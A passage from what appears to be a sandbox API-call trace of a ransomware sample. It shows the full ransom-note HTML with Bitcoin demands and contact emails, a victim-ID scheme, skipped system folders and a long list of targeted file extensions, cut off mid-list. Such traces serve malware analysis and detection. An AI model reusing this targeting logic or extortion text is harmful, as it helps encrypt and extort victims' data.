	[0180.569] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.569] CloseHandle (hObject=0x380) returned 1
	[0180.570] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.570] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.570] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.570] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned 52
	[0180.570] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.573] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.573] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.575] CloseHandle (hObject=0x380) returned 1
	[0180.576] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.576] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.576] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.577] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.578] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.578] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.579] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.579] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.580] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.580] CloseHandle (hObject=0x380) returned 1
	[0180.580] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*" (normalized: "c:\\users\\public\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.580] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\*.*") returned 27
	[0180.580] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.581] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Desktop\\*.*", cchLength=0x1b | out: lpsz="c:\\users\\public\\desktop\\*.*") returned 0x1b
	[0180.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.581] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="windows") returned 0x0
	[0180.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.581] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="boot") returned 0x0
	[0180.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.581] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="system volume information") returned 0x0
	[0180.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.582] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.582] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="temp") returned 0x0
	[0180.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.582] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="program files") returned 0x0
	[0180.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.582] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.583] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="appdata") returned 0x0
	[0180.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.583] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="application data") returned 0x0
	[0180.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.583] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="winnt") returned 0x0
	[0180.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.583] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="tmp") returned 0x0
	[0180.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.584] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="cache") returned 0x0
	[0180.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.584] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.584] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="webcache") returned 0x0
	[0180.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.585] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="inetcache") returned 0x0
	[0180.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.585] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="nvidia") returned 0x0
	[0180.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.585] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="packages") returned 0x0
	[0180.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.585] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="cookies") returned 0x0
	[0180.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.585] StrStrW (lpFirst="c:\\users\\public\\desktop\\*.*", lpSrch="programdata") returned 0x0
	[0180.586] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.586] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.586] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.586] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.586] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.586] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780f4db2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x852af54d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.586] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780ceeaf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780ceeaf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8528944a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.586] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780ceeaf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780ceeaf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8528944a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.586] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.587] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.587] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.587] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0180.587] lstrcmpW (lpString1="Documents", lpString2="..") returned 1
	[0180.587] lstrcmpW (lpString1="Documents", lpString2=".") returned 1
	[0180.587] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.588] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.588] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents"
	[0180.588] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents"
	[0180.588] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.588] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.588] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\*.*") returned="C:\\Users\\Public\\Documents\\*.*"
	[0180.588] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*" (normalized: "c:\\users\\public\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x7814117a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.588] lstrlenW (lpString="C:\\Users\\Public\\Documents\\*.*") returned 29
	[0180.589] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.589] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\public\\documents\\*.*") returned 0x1d
	[0180.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.589] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="windows") returned 0x0
	[0180.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.589] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="boot") returned 0x0
	[0180.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.589] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="system volume information") returned 0x0
	[0180.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.590] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.590] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="temp") returned 0x0
	[0180.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.590] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="program files") returned 0x0
	[0180.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.590] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.591] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="appdata") returned 0x0
	[0180.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.591] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="application data") returned 0x0
	[0180.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.591] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="winnt") returned 0x0
	[0180.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.591] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="tmp") returned 0x0
	[0180.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.592] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="cache") returned 0x0
	[0180.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.592] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.592] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="webcache") returned 0x0
	[0180.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.592] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="inetcache") returned 0x0
	[0180.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.593] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="nvidia") returned 0x0
	[0180.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.593] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="packages") returned 0x0
	[0180.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.593] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="cookies") returned 0x0
	[0180.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.593] StrStrW (lpFirst="c:\\users\\public\\documents\\*.*", lpSrch="programdata") returned 0x0
	[0180.594] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x7814117a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.594] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.594] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.594] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.594] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.602] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Documents\\desktop.ini") returned="C:\\Users\\Public\\Documents\\desktop.ini"
	[0180.602] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37
	[0180.603] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.603] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\desktop.ini", cchLength=0x25 | out: lpsz="c:\\users\\public\\documents\\desktop.ini") returned 0x25
	[0180.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.603] StrStrW (lpFirst="c:\\users\\public\\documents\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.603] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\documents\\desktop.ini" | out: lpString1="c:\\users\\public\\documents\\desktop.ini") returned="c:\\users\\public\\documents\\desktop.ini"
	[0180.603] lstrlenW (lpString="c:\\users\\public\\documents\\desktop.ini") returned 37
	[0180.603] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.604] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.604] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dd